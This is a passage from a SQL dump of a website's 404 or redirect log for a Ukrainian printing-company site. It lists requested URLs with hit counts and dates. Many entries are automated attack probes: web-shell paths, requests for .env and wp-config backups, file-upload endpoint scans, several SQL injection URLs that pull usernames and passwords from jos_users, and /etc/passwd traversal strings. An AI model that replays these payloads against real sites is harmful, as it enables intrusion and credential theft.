00:00:00',301),(16687,'https://ekvatorprint.com.ua/ht.access',NULL,'http://ekvatorprint.com.ua/ht.access','',1,0,'2020-04-29 06:20:02','0000-00-00 00:00:00',301),(16688,'https://ekvatorprint.com.ua/civicrm/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php',NULL,'http://www.google.com/','',1,0,'2020-04-29 07:17:22','0000-00-00 00:00:00',301),(16689,'https://ekvatorprint.com.ua/vz.php',NULL,'http://site.ru','',4,0,'2020-04-29 07:20:35','0000-00-00 00:00:00',301),(16690,'https://ekvatorprint.com.ua/plugins/lec.php',NULL,'http://site.ru','',2,0,'2020-04-29 07:43:12','0000-00-00 00:00:00',301),(16691,'https://ekvatorprint.com.ua/.info.php',NULL,'http://site.ru','',3,0,'2020-04-29 08:13:12','0000-00-00 00:00:00',301),(16692,'https://ekvatorprint.com.ua/sl.php.suspected',NULL,'http://site.ru','',2,0,'2020-04-29 09:04:56','0000-00-00 00:00:00',301),(16693,'https://ekvatorprint.com.ua/wp-content/plugins/background-image-cropper/wp-console.php',NULL,'http://site.ru','',2,0,'2020-04-29 12:32:00','0000-00-00 00:00:00',301),(16694,'https://ekvatorprint.com.ua/wp-content/uploads/ix.php.php',NULL,'http://site.ru','',3,0,'2020-04-29 16:31:30','0000-00-00 00:00:00',301),(16695,'https://ekvatorprint.com.ua/master.php',NULL,'http://site.ru','',4,0,'2020-04-29 16:52:00','0000-00-00 00:00:00',301),(16696,'https://ekvatorprint.com.ua/m0m.php',NULL,'http://site.ru','',3,0,'2020-04-29 17:19:42','0000-00-00 00:00:00',301),(16697,'https://ekvatorprint.com.ua/stats/wp-caches.php',NULL,'http://site.ru','',2,0,'2020-04-29 19:04:59','0000-00-00 00:00:00',301),(16698,'https://ekvatorprint.com.ua/um0six6/mini-shell.php',NULL,'http://site.ru','',3,0,'2020-04-29 20:17:42','0000-00-00 00:00:00',301),(16699,'https://ekvatorprint.com.ua/sax.php',NULL,'http://site.ru','',2,0,'2020-04-29 22:08:31','0000-00-00 00:00:00',301),(16700,'https://ekvatorprint.com.ua/components/com_foxcontact/orvx.php',NULL,'http://site.ru','',1,0,'2020-04-29 22:59:02','0000-00-00 00:00:00',301),(16701,'https://ekvatorprint.com.ua/wp-content/themes/dulcet/footer1.php',NULL,'http://site.ru','',3,0,'2020-04-29 23:24:34','0000-00-00 00:00:00',301),(16702,'https://ekvatorprint.com.ua/config.php.suspected',NULL,'http://site.ru','',3,0,'2020-04-30 00:18:30','0000-00-00 00:00:00',301),(16703,'https://ekvatorprint.com.ua/boom.php',NULL,'http://site.ru','',20,0,'2020-04-30 00:38:29','0000-00-00 00:00:00',301),(16704,'https://ekvatorprint.com.ua/wp-admin/user/user-profile.php',NULL,'http://site.ru','',4,0,'2020-04-30 01:34:18','0000-00-00 00:00:00',301),(16705,'https://ekvatorprint.com.ua/administrator1/components/mode.php',NULL,'http://site.ru','',1,0,'2020-04-30 03:16:03','0000-00-00 00:00:00',301),(16706,'https://ekvatorprint.com.ua/cli/db2.php',NULL,'http://site.ru','',4,0,'2020-04-30 08:17:21','0000-00-00 00:00:00',301),(16707,'http://ekvatorprint.com.ua/manager/min/readme.txt',NULL,'http://ekvatorprint.com.ua/manager/min/README.txt','',1,0,'2020-05-01 03:36:39','0000-00-00 00:00:00',301),(16708,'http://ekvatorprint.com.ua/apple-touch-icon-176x176-precomposed.png',NULL,'','',1,0,'2020-05-03 14:11:01','0000-00-00 00:00:00',301),(16709,'http://ekvatorprint.com.ua/apple-touch-icon-57x57-precomposed.png',NULL,'','',1,0,'2020-05-03 14:11:01','0000-00-00 00:00:00',301),(16710,'http://ekvatorprint.com.ua/apple-touch-icon-180x180-precomposed.png',NULL,'','',1,0,'2020-05-03 14:11:01','0000-00-00 00:00:00',301),(16711,'https://ekvatorprint.com.ua/jsupload/server/php/',NULL,'','',1,0,'2020-05-03 18:15:52','0000-00-00 00:00:00',301),(16712,'https://ekvatorprint.com.ua/jquery_files/server/php/',NULL,'','',1,0,'2020-05-03 18:15:54','0000-00-00 00:00:00',301),(16713,'https://ekvatorprint.com.ua/jquery/server/php/',NULL,'','',1,0,'2020-05-03 18:15:56','0000-00-00 00:00:00',301),(16714,'https://ekvatorprint.com.ua/js/file-uploader/server/php/',NULL,'','',1,0,'2020-05-03 18:15:57','0000-00-00 00:00:00',301),(16715,'https://ekvatorprint.com.ua/file-uploader/server/php/',NULL,'','',1,0,'2020-05-03 18:16:00','0000-00-00 00:00:00',301),(16716,'https://ekvatorprint.com.ua/fileuploader/server/php/',NULL,'','',1,0,'2020-05-03 18:16:01','0000-00-00 00:00:00',301),(16717,'https://ekvatorprint.com.ua/file-upload/server/php/',NULL,'','',1,0,'2020-05-03 18:16:03','0000-00-00 00:00:00',301),(16718,'https://ekvatorprint.com.ua/uploader/server/php/',NULL,'','',1,0,'2020-05-03 18:16:04','0000-00-00 00:00:00',301),(16719,'https://ekvatorprint.com.ua/fileupload/server/php/',NULL,'','',1,0,'2020-05-03 18:16:05','0000-00-00 00:00:00',301),(16720,'https://ekvatorprint.com.ua/admin/server/php/',NULL,'','',1,0,'2020-05-03 18:16:06','0000-00-00 00:00:00',301),(16721,'https://ekvatorprint.com.ua/admin/js/lib/jquery-file-upload/server/php/',NULL,'','',1,0,'2020-05-03 18:16:08','0000-00-00 00:00:00',301),(16722,'https://ekvatorprint.com.ua/administrator/assets/plugins/jquery-file-upload/server/php/',NULL,'','',1,0,'2020-05-03 18:16:09','0000-00-00 00:00:00',301),(16723,'https://ekvatorprint.com.ua/assets/file-uploader/server/php/',NULL,'','',1,0,'2020-05-03 18:16:11','0000-00-00 00:00:00',301),(16724,'https://ekvatorprint.com.ua/public/assets/jquery-file-upload-9.5.0/server/php/',NULL,'','',1,0,'2020-05-03 18:16:15','0000-00-00 00:00:00',301),(16725,'https://ekvatorprint.com.ua/assets/plugins/jquery-file-upload/server/php/',NULL,'','',11,0,'2020-05-03 18:16:16','0000-00-00 00:00:00',301),(16726,'https://ekvatorprint.com.ua/backend/assets/global/plugins/jquery-file-upload/server/php/',NULL,'','',1,0,'2020-05-03 18:16:17','0000-00-00 00:00:00',301),(16727,'https://ekvatorprint.com.ua/assets/assets/global/plugins/jquery-file-upload/server/php/',NULL,'','',1,0,'2020-05-03 18:16:18','0000-00-00 00:00:00',301),(16728,'https://ekvatorprint.com.ua/components/com_jbcatalog/libraries/jsupload/server/php/',NULL,'','',1,0,'2020-05-03 18:16:20','0000-00-00 00:00:00',301),(16729,'https://ekvatorprint.com.ua/admin/drag-drop/server/php/',NULL,'','',1,0,'2020-05-03 18:16:21','0000-00-00 00:00:00',301),(16730,'https://ekvatorprint.com.ua/admin/global/plugins/jquery-file-upload/server/php/',NULL,'','',1,0,'2020-05-03 18:16:23','0000-00-00 00:00:00',301),(16731,'https://ekvatorprint.com.ua/assets/global/plugins/jquery-file-upload/server/php/',NULL,'','',9,0,'2020-05-03 18:16:24','0000-00-00 00:00:00',301),(16732,'https://ekvatorprint.com.ua/plugins/jquery-file-upload/server/php/',NULL,'','',7,0,'2020-05-03 18:16:26','0000-00-00 00:00:00',301),(16733,'https://ekvatorprint.com.ua/plugins/server/php/',NULL,'','',1,0,'2020-05-03 18:16:27','0000-00-00 00:00:00',301),(16734,'https://ekvatorprint.com.ua/addvideo/server/php/',NULL,'','',1,0,'2020-05-03 18:16:28','0000-00-00 00:00:00',301),(16735,'https://ekvatorprint.com.ua/plugins/fileupload/server/php/',NULL,'','',1,0,'2020-05-03 18:16:30','0000-00-00 00:00:00',301),(16736,'https://ekvatorprint.com.ua/js/jquery-file-upload/server/php/',NULL,'','',1,0,'2020-05-03 18:16:31','0000-00-00 00:00:00',301),(16737,'https://ekvatorprint.com.ua/assets/jquery-file-upload/server/php/',NULL,'','',6,0,'2020-05-03 18:16:32','0000-00-00 00:00:00',301),(16738,'https://ekvatorprint.com.ua/admin/assets/jquery-file-upload/server/php/',NULL,'','',1,0,'2020-05-03 18:16:36','0000-00-00 00:00:00',301),(16739,'https://ekvatorprint.com.ua/cms/server/php/',NULL,'','',1,0,'2020-05-03 18:16:37','0000-00-00 00:00:00',301),(16740,'https://ekvatorprint.com.ua/public/upload_nhieuanh/server/php/',NULL,'','',1,0,'2020-05-03 18:16:39','0000-00-00 00:00:00',301),(16741,'https://ekvatorprint.com.ua/public/server/php/',NULL,'','',1,0,'2020-05-03 18:16:40','0000-00-00 00:00:00',301),(16742,'https://ekvatorprint.com.ua/admin/gallery/server/php/',NULL,'','',1,0,'2020-05-03 18:16:42','0000-00-00 00:00:00',301),(16743,'https://ekvatorprint.com.ua/jquery-file-upload/server/php/',NULL,'','',1,0,'2020-05-03 18:16:43','0000-00-00 00:00:00',301),(16744,'https://ekvatorprint.com.ua/vendor/server/php/',NULL,'','',1,0,'2020-05-03 18:16:46','0000-00-00 00:00:00',301),(16745,'http://ekvatorprint.com.ua/wp-includes/css/buttons.css',NULL,'','',1,0,'2020-05-04 09:40:43','0000-00-00 00:00:00',301),(16746,'http://ekvatorprint.com.ua/modules/mod_ppc_simple_spotlight/img/tired.jpg',NULL,'','',1,0,'2020-05-04 20:07:02','0000-00-00 00:00:00',301),(16747,'http://ekvatorprint.com.ua/images/jdownloads/screenshots/yo.gif',NULL,'','',2,0,'2020-05-06 23:18:22','0000-00-00 00:00:00',301),(16748,'https://ekvatorprint.com.ua/mysql-adminer.php',NULL,'ekvatorprint.com.ua','',1,0,'2020-05-07 11:31:06','0000-00-00 00:00:00',301),(16749,'https://ekvatorprint.com.ua/adminer/index.php',NULL,'ekvatorprint.com.ua','',2,0,'2020-05-07 11:31:23','0000-00-00 00:00:00',301),(16750,'http://ekvatorprint.com.ua/images/jdownloads/screenshots/zxcvbnm.gif',NULL,'','',1,0,'2020-05-08 21:43:38','0000-00-00 00:00:00',301),(16751,'http://ekvatorprint.com.ua/images/jdownloads/screenshots/yunus.gif',NULL,'','',1,0,'2020-05-08 23:40:53','0000-00-00 00:00:00',301),(16752,'http://ekvatorprint.com.ua/ganteng.gif',NULL,'','',1,0,'2020-05-09 06:44:26','0000-00-00 00:00:00',301),(16753,'http://ekvatorprint.com.ua/images/krd.txt',NULL,'','',1,0,'2020-05-09 08:33:06','0000-00-00 00:00:00',301),(16754,'http://ekvatorprint.com.ua/images/0wn.txt',NULL,'','',1,0,'2020-05-09 11:16:30','0000-00-00 00:00:00',301),(16755,'http://ekvatorprint.com.ua/images/nyet.gif',NULL,'','',1,0,'2020-05-09 13:07:41','0000-00-00 00:00:00',301),(16756,'http://ekvatorprint.com.ua/images/ganteng.gif',NULL,'','',1,0,'2020-05-09 14:31:26','0000-00-00 00:00:00',301),(16757,'http://ekvatorprint.com.ua/images/0bit0.gif',NULL,'','',1,0,'2020-05-09 19:54:58','0000-00-00 00:00:00',301),(16758,'http://ekvatorprint.com.ua/hacked.gif',NULL,'','',1,0,'2020-05-09 20:37:16','0000-00-00 00:00:00',301),(16759,'http://ekvatorprint.com.ua/components/com_gmapfp/libraries/map.js',NULL,'','',1,0,'2020-05-10 06:22:43','0000-00-00 00:00:00',301),(16760,'https://ekvatorprint.com.ua/admin/admin.php',NULL,'','',2,0,'2020-05-14 00:48:35','0000-00-00 00:00:00',301),(16761,'https://ekvatorprint.com.ua/adm/',NULL,'','',3,0,'2020-05-14 00:48:36','0000-00-00 00:00:00',301),(16762,'https://ekvatorprint.com.ua/horde/imp/test.php',NULL,'','',6,0,'2020-05-14 15:11:27','0000-00-00 00:00:00',301),(16763,'https://ekvatorprint.com.ua/login?from=0.000000',NULL,'','',6,0,'2020-05-14 15:11:28','0000-00-00 00:00:00',301),(16764,'https://ekvatorprint.com.ua/sitemaps.xml',NULL,'','',13,0,'2020-05-14 20:21:21','0000-00-00 00:00:00',301),(16765,'http://ekvatorprint.com.ua/wp-includes/images/rss.png',NULL,'http://ekvatorprint.com.ua/','',1,0,'2020-05-14 20:59:21','0000-00-00 00:00:00',301),(16766,'https://ekvatorprint.com.ua/phpformbuilder/plugins/jquery-file-upload/server/php/index.php',NULL,'','',4,0,'2020-05-16 13:04:50','0000-00-00 00:00:00',301),(16767,'https://ekvatorprint.com.ua/ajax/api/content_infraction/getindexablecontent',NULL,'','',1,0,'2020-05-16 15:09:28','0000-00-00 00:00:00',301),(16768,'https://ekvatorprint.com.ua/ajax/api/content_event/getindexablecontent',NULL,'','',1,0,'2020-05-16 15:09:28','0000-00-00 00:00:00',301),(16769,'https://ekvatorprint.com.ua/wp-json/',NULL,'','',1,0,'2020-05-18 14:25:01','0000-00-00 00:00:00',301),(16770,'https://ekvatorprint.com.ua/test/.env',NULL,'','',35,0,'2020-05-20 16:32:43','0000-00-00 00:00:00',301),(16771,'https://ekvatorprint.com.ua/vendor/.env',NULL,'','',51,0,'2020-05-20 16:32:48','0000-00-00 00:00:00',301),(16772,'https://ekvatorprint.com.ua/sites/.env',NULL,'','',28,0,'2020-05-20 16:32:52','0000-00-00 00:00:00',301),(16773,'https://ekvatorprint.com.ua/blog/.env',NULL,'','',48,0,'2020-05-20 16:32:56','0000-00-00 00:00:00',301),(16774,'https://ekvatorprint.com.ua/public/.env',NULL,'','',100,0,'2020-05-20 16:33:03','0000-00-00 00:00:00',301),(16775,'https://ekvatorprint.com.ua/shop/.env',NULL,'','',22,0,'2020-05-20 16:33:06','0000-00-00 00:00:00',301),(16776,'http://ekvatorprint.com.ua/wp-content/plugins/photo-gallery/readme.txt',NULL,'','',1,0,'2020-05-21 10:53:25','0000-00-00 00:00:00',301),(16777,'https://ekvatorprint.com.ua/demo/wp-includes/wlwmanifest.xml',NULL,'','',2,0,'2020-05-21 22:18:19','0000-00-00 00:00:00',301),(16778,'https://ekvatorprint.com.ua/beta/wp-includes/wlwmanifest.xml',NULL,'','',7,0,'2020-05-21 22:21:18','0000-00-00 00:00:00',301),(16779,'https://ekvatorprint.com.ua/1/wp-includes/wlwmanifest.xml',NULL,'','',2,0,'2020-05-21 22:27:39','0000-00-00 00:00:00',301),(16780,'https://ekvatorprint.com.ua/blogs/wp-includes/wlwmanifest.xml',NULL,'','',6,0,'2020-05-21 22:29:04','0000-00-00 00:00:00',301),(16781,'https://ekvatorprint.com.ua/contacts/price',NULL,'','',1,0,'2020-05-25 04:52:51','0000-00-00 00:00:00',301),(16782,'https://ekvatorprint.com.ua/contacts/delivery',NULL,'','',1,0,'2020-05-25 04:53:15','0000-00-00 00:00:00',301),(16783,'https://ekvatorprint.com.ua/contacts/contacts',NULL,'','',1,0,'2020-05-25 04:53:48','0000-00-00 00:00:00',301),(16784,'https://ekvatorprint.com.ua/contacts/trebovaniya',NULL,'','',1,0,'2020-05-25 04:53:57','0000-00-00 00:00:00',301),(16785,'https://ekvatorprint.com.ua/contacts/video',NULL,'','',1,0,'2020-05-25 04:54:06','0000-00-00 00:00:00',301),(16786,'https://ekvatorprint.com.ua/contacts/banner-printing',NULL,'','',1,0,'2020-05-25 04:54:15','0000-00-00 00:00:00',301),(16787,'https://ekvatorprint.com.ua/contacts/print-billboards',NULL,'','',1,0,'2020-05-25 04:54:24','0000-00-00 00:00:00',301),(16788,'https://ekvatorprint.com.ua/contacts/printing-on-vinyl',NULL,'','',1,0,'2020-05-25 04:54:35','0000-00-00 00:00:00',301),(16789,'https://ekvatorprint.com.ua/contacts/printing-on-canvas',NULL,'','',1,0,'2020-05-25 04:54:46','0000-00-00 00:00:00',301),(16790,'https://ekvatorprint.com.ua/contacts/printing-on-the-grid',NULL,'','',1,0,'2020-05-25 04:54:56','0000-00-00 00:00:00',301),(16791,'https://ekvatorprint.com.ua/contacts/print-great-photos',NULL,'','',1,0,'2020-05-25 04:55:05','0000-00-00 00:00:00',301),(16792,'https://ekvatorprint.com.ua/contacts/print-photo',NULL,'','',1,0,'2020-05-25 04:55:15','0000-00-00 00:00:00',301),(16793,'https://ekvatorprint.com.ua/contacts/print-flags',NULL,'','',1,0,'2020-05-25 04:55:25','0000-00-00 00:00:00',301),(16794,'https://ekvatorprint.com.ua/contacts/print-citylights',NULL,'','',1,0,'2020-05-25 04:55:35','0000-00-00 00:00:00',301),(16795,'https://ekvatorprint.com.ua/contacts/printing-on-an-awning',NULL,'','',1,0,'2020-05-25 04:55:43','0000-00-00 00:00:00',301),(16796,'https://ekvatorprint.com.ua/contacts/modulnye-kartiny',NULL,'','',1,0,'2020-05-25 04:55:53','0000-00-00 00:00:00',301),(16797,'https://ekvatorprint.com.ua/contacts/plotternaya-podrezka',NULL,'','',1,0,'2020-05-25 04:56:01','0000-00-00 00:00:00',301),(16798,'https://ekvatorprint.com.ua/wp-config.php_original',NULL,'ekvatorprint.com.ua','',5,0,'2020-05-27 10:44:24','0000-00-00 00:00:00',301),(16799,'https://ekvatorprint.com.ua/wp-config.php-original',NULL,'ekvatorprint.com.ua','',6,0,'2020-05-27 10:44:37','0000-00-00 00:00:00',301),(16800,'https://ekvatorprint.com.ua/</a></span><br',NULL,'','',1,0,'2020-05-28 07:27:32','0000-00-00 00:00:00',301),(16801,'https://ekvatorprint.com.ua/index.php?option=com_youtubegallery&view=youtubegallery&listid=-1+union+select+1,1,1,1,1,1,1&themeid=1',NULL,'','',1,0,'2020-06-01 04:57:01','0000-00-00 00:00:00',301),(16802,'https://ekvatorprint.com.ua/plugins/jplugin/jplugin/j2plugin.php',NULL,'ekvatorprint.com.ua','',1,0,'2020-06-02 10:24:08','0000-00-00 00:00:00',301),(16803,'https://ekvatorprint.com.ua/cache/thumbsj3tmp/img.resize.php',NULL,'ekvatorprint.com.ua','',1,0,'2020-06-02 10:26:10','0000-00-00 00:00:00',301),(16804,'https://ekvatorprint.com.ua/templates/jtemplates/jtemplates.php',NULL,'ekvatorprint.com.ua','',2,0,'2020-06-02 10:28:34','0000-00-00 00:00:00',301),(16805,'https://ekvatorprint.com.ua/templates/j11templates/j11templates.php',NULL,'ekvatorprint.com.ua','',2,0,'2020-06-02 10:30:23','0000-00-00 00:00:00',301),(16806,'https://ekvatorprint.com.ua/templates/j9templates/j9templates.php',NULL,'ekvatorprint.com.ua','',2,0,'2020-06-02 10:30:37','0000-00-00 00:00:00',301),(16807,'https://ekvatorprint.com.ua/modules/thumbsj3tmp/img.resize.php',NULL,'ekvatorprint.com.ua','',1,0,'2020-06-02 10:31:03','0000-00-00 00:00:00',301),(16808,'https://ekvatorprint.com.ua/templates/j7templates/j7templates.php',NULL,'ekvatorprint.com.ua','',2,0,'2020-06-02 10:32:47','0000-00-00 00:00:00',301),(16809,'https://ekvatorprint.com.ua/index.php?option=com_fireboard&itemid=0&id=1&catid=0&func=fb_pdf\'',NULL,'','',1,0,'2020-06-03 01:18:03','0000-00-00 00:00:00',301),(16810,'https://ekvatorprint.com.ua/xmlrpcs.php',NULL,'ekvatorprint.com.ua','',5,0,'2020-06-03 10:40:51','0000-00-00 00:00:00',301),(16811,'https://ekvatorprint.com.ua/s_e.php',NULL,'ekvatorprint.com.ua','',24,0,'2020-06-03 12:37:51','0000-00-00 00:00:00',301),(16812,'https://ekvatorprint.com.ua/component/option,com_myblog/',NULL,'','',1,0,'2020-06-03 18:51:30','0000-00-00 00:00:00',301),(16813,'https://ekvatorprint.com.ua/mysql/',NULL,'','',3,0,'2020-06-04 15:35:21','0000-00-00 00:00:00',301),(16814,'https://ekvatorprint.com.ua/\",null,null,null,[],[],null,\"https:/googleads.g.doubleclick.net/pagead/conversion/?ai=cvjahh9lzxudrldno6gt3lpe48ydr8fbt5zitmgm23ccehgiqascjvb0uykugoag6-s--a8gbaakc64vkwdihzd6oawhia8seqgsoak_qpsn1yieph4_gpi6ptwkfx5hxjihhxzofkgfrkz6g7zu3-bxtgjvydzief4it8aur58at8ojubyo6zvpgcnvh9drcrwny6abwryudhxacqugf2x84fwipye4-ne5nneslpx5nwjy5xocqvkk2kv_kt8nqjwrm2ydp7i2bagkyc7rmi5irkf1dlovn0rzbg5w2oyaxs1nshd18duke6ibfj78y4lpz94ec89_xzbnxlo3aycsnoi-fkkgejsahdwp-m3z9jnlkmai3jwxzgpu7noqclxwxkjs_1pwow3e4qmf2jpzzu-wjr1zqhrbafbtyxkqgqwrjpzqvn3j63trw6uq-i3cqhhktzbfukcaejpv2zp0biaxsvo-ub9ggbiahrowwqaghjs4bqafvyruob5pyg6ghugaob_dzg6gh8tkbqaemvhuob-zvg6gh89ebqafs1ruob5byg6ghwtob2acboaj0fbaiatiibwiayrabgb-xcrwcjgrkqrxzgaobmasbyasb2bmmghqhggviyi5sdg',NULL,'','',1,0,'2020-06-05 05:03:29','0000-00-00 00:00:00',301),(16815,'https://ekvatorprint.com.ua/user.sql',NULL,'http://ekvatorprint.com.ua/user.sql?','',1,0,'2020-06-06 17:39:45','0000-00-00 00:00:00',301),(16816,'https://ekvatorprint.com.ua/file.sql',NULL,'http://ekvatorprint.com.ua/file.sql','',1,0,'2020-06-06 17:55:52','0000-00-00 00:00:00',301),(16817,'https://ekvatorprint.com.ua/source.sql',NULL,'http://ekvatorprint.com.ua/source.sql','',1,0,'2020-06-06 19:05:17','0000-00-00 00:00:00',301),(16818,'https://ekvatorprint.com.ua/src.sql',NULL,'http://ekvatorprint.com.ua/src.sql','',1,0,'2020-06-06 19:14:37','0000-00-00 00:00:00',301),(16819,'https://ekvatorprint.com.ua/index.php?option=com_djclassifieds&task=upload&tmpl=component',NULL,'','',5,0,'2020-06-08 19:58:33','0000-00-00 00:00:00',301),(16820,'https://ekvatorprint.com.ua/wp-config.php.original',NULL,'ekvatorprint.com.ua','',6,0,'2020-06-09 05:59:03','0000-00-00 00:00:00',301),(16821,'https://ekvatorprint.com.ua/wp-config.phporiginal',NULL,'ekvatorprint.com.ua','',5,0,'2020-06-09 05:59:11','0000-00-00 00:00:00',301),(16822,'https://ekvatorprint.com.ua/assets/plugins/jquery-file-upload/server/php/index.php',NULL,'http://www.google.com/','',5,0,'2020-06-10 03:02:40','0000-00-00 00:00:00',301),(16823,'https://ekvatorprint.com.ua/assets/global/plugins/jquery-file-upload/server/php/index.php',NULL,'http://www.google.com/','',5,0,'2020-06-10 03:02:40','0000-00-00 00:00:00',301),(16824,'https://ekvatorprint.com.ua/assets/jquery-file-upload/server/php/index.php',NULL,'http://www.google.com/','',5,0,'2020-06-10 03:02:41','0000-00-00 00:00:00',301),(16825,'https://ekvatorprint.com.ua/index.php?option=com_muscol&view=artists&letter=1\"+and+1=0+union+select+1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+jos_users+where+gid=24+limit+0,1--+a',NULL,'','',1,0,'2020-06-10 09:37:16','0000-00-00 00:00:00',301),(16826,'https://ekvatorprint.com.ua/index.php?option=com_muscol&view=artists&letter=1\"+and+1=0+union+select+1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+jos_users+where+gid=25+limit+0,1--+a',NULL,'','',1,0,'2020-06-10 09:37:21','0000-00-00 00:00:00',301),(16827,'https://ekvatorprint.com.ua/index.php?option=com_content\'[t] &view=article&id=17&itemid=18',NULL,'http://ekvatorprint.com.ua/index.php?option=com_content\'[t] &view=article&id=17&Itemid=18','',1,0,'2020-06-10 17:17:03','0000-00-00 00:00:00',301),(16828,'https://ekvatorprint.com.ua/index.php?option=com_content&view=article\'[t] &id=17&itemid=18',NULL,'http://ekvatorprint.com.ua/index.php?option=com_content&view=article\'[t] &id=17&Itemid=18','',1,0,'2020-06-10 17:17:06','0000-00-00 00:00:00',301),(16829,'https://ekvatorprint.com.ua/index.php?option=/etc/passwd&view=article&id=17&itemid=18',NULL,'http://ekvatorprint.com.ua/index.php?option=/etc/passwd&view=article&id=17&Itemid=18','',1,0,'2020-06-10 17:17:14','0000-00-00 00:00:00',301),(16830,'https://ekvatorprint.com.ua/index.php?option=com_content&view=/etc/passwd&id=17&itemid=18',NULL,'http://ekvatorprint.com.ua/index.php?option=com_content&view=/etc/passwd&id=17&Itemid=18','',1,0,'2020-06-10 17:17:15','0000-00-00 00:00:00',301),(16831,'https://ekvatorprint.com.ua/images/stories/cmd.php',NULL,'','',2,0,'2020-06-12 03:54:32','0000-00-00 00:00:00',301),(16832,'https://ekvatorprint.com.ua/images/jsspwneed.php',NULL,'','',2,0,'2020-06-12 03:54:33','0000-00-00 00:00:00',301),(16833,'https://ekvatorprint.com.ua/templates/beez_3/index.php',NULL,'','',2,0,'2020-06-12 03:55:01','0000-00-00 00:00:00',301),(16834,'https://ekvatorprint.com.ua/z.php',NULL,'','',24,0,'2020-06-12 03:55:05','0000-00-00 00:00:00',301),(16835,'https://ekvatorprint.com.ua/d.php',NULL,'','',6,0,'2020-06-12 03:55:06','0000-00-00 00:00:00',301),(16836,'https://ekvatorprint.com.ua/t.php',NULL,'','',6,0,'2020-06-12 03:55:08','0000-00-00 00:00:00',301),(16837,'https://ekvatorprint.com.ua/2018.php',NULL,'','',2,0,'2020-06-12 03:55:10','0000-00-00 00:00:00',301),(16838,'https://ekvatorprint.com.ua/y.php',NULL,'','',9,0,'2020-06-12 03:55:13','0000-00-00 00:00:00',301),(16839,'https://ekvatorprint.com.ua/e.php',NULL,'','',9,0,'2020-06-12 03:55:15','0000-00-00 00:00:00',301),(16840,'https://ekvatorprint.com.ua/wp.php',NULL,'','',43,0,'2020-06-12 03:55:19','0000-00-00 00:00:00',301),(16841,'https://ekvatorprint.com.ua/cpanel.php',NULL,'','',2,0,'2020-06-12 03:55:20','0000-00-00 00:00:00',301),(16842,'https://ekvatorprint.com.ua/cp.php',NULL,'','',4,0,'2020-06-12 03:55:21','0000-00-00 00:00:00',301),(16843,'https://ekvatorprint.com.ua/root.php',NULL,'','',7,0,'2020-06-12 03:55:22','0000-00-00 00:00:00',301),(16844,'https://ekvatorprint.com.ua/1337w0rm.php',NULL,'','',2,0,'2020-06-12 03:55:23','0000-00-00 00:00:00',301),(16845,'https://ekvatorprint.com.ua/2019.php',NULL,'','',2,0,'2020-06-12 03:55:24','0000-00-00 00:00:00',301),(16846,'https://ekvatorprint.com.ua/?view=videos&type=member&user_id=1 and 1=0 union select 1,2,3,4,5,6,7,8,9,10,11,12,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),14,15,16,17,18,19,20,21,22,23,24,25,26,27 from+jos_users+where+gid=24+limit+0,1--&option=com_jomtube',NULL,'','',2,0,'2020-06-14 06:29:26','0000-00-00 00:00:00',301),(16847,'https://ekvatorprint.com.ua/?view=videos&type=member&user_id=1 and 1=0 union select 1,2,3,4,5,6,7,8,9,10,11,12,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),14,15,16,17,18,19,20,21,22,23,24,25,26,27 from+jos_users+where+gid=25+limit+0,1--&option=com_jomtube',NULL,'','',2,0,'2020-06-14 06:29:28','0000-00-00 00:00:00',301),(16848,'https://ekvatorprint.com.ua/index.php?view=videos&type=member&user_id=66+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),14,15,16,17,18,19,20,21,22,23,24,25,26+from+jos_users+where+gid=24+limit+0,1--&option=com_mytube',NULL,'','',1,0,'2020-06-15 03:08:59','0000-00-00 00:00:00',301),(16849,'https://ekvatorprint.com.ua/index.php?view=videos&type=member&user_id=66+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),14,15,16,17,18,19,20,21,22,23,24,25,26+from+jos_users+where+gid=25+limit+0,1--&option=com_mytube',NULL,'','',1,0,'2020-06-15 03:09:01','0000-00-00 00:00:00',301),(16850,'https://ekvatorprint.com.ua/prov/simple.php5',NULL,'http://site.ru','',3,0,'2020-06-15 05:37:35','0000-00-00 00:00:00',301),(16851,'https://ekvatorprint.com.ua/cache/doc.php',NULL,'http://site.ru','',11,0,'2020-06-15 07:30:25','0000-00-00 00:00:00',301),(16852,'https://ekvatorprint.com.ua/wp-plugins.php',NULL,'http://site.ru','',27,0,'2020-06-15 07:38:41','0000-00-00 00:00:00',301),(16853,'https://ekvatorprint.com.ua/network/content-post.php',NULL,'http://site.ru','',4,0,'2020-06-15 10:23:03','0000-00-00 00:00:00',301),(16854,'https://ekvatorprint.com.ua/components/com_banners/models/mod.php',NULL,'http://site.ru','',5,0,'2020-06-15 16:31:02','0000-00-00 00:00:00',301),(16855,'https://ekvatorprint.com.ua/ekvatorprintcomua.zip',NULL,'','',2,0,'2020-06-15 18:32:27','0000-00-00 00:00:00',301),(16856,'https://ekvatorprint.com.ua/gank.php.php',NULL,'http://site.ru','',28,0,'2020-06-15 18:51:05','0000-00-00 00:00:00',301),(16857,'https://ekvatorprint.com.ua/wp-content/themes/twentynineteen/style.php',NULL,'http://site.ru','',1,0,'2020-06-15 19:43:15','0000-00-00 00:00:00',301),(16858,'https://ekvatorprint.com.ua/web/cache/blackhat.php',NULL,'http://site.ru','',4,0,'2020-06-15 21:27:15','0000-00-00 00:00:00',301),(16859,'https://ekvatorprint.com.ua/wp-configuration.php_',NULL,'ekvatorprint.com.ua','',1,0,'2020-06-16 03:19:43','0000-00-00 00:00:00',301),(16860,'https://ekvatorprint.com.ua/wp-configuration.php~',NULL,'ekvatorprint.com.ua','',1,0,'2020-06-16 03:19:59','0000-00-00 00:00:00',301),(16861,'https://ekvatorprint.com.ua/components/com_users/user.php',NULL,'http://site.ru','',2,0,'2020-06-16 04:38:19','0000-00-00 00:00:00',301),(16862,'https://ekvatorprint.com.ua/cache/wp-defence.php',NULL,'http://site.ru','',2,0,'2020-06-16 04:46:54','0000-00-00 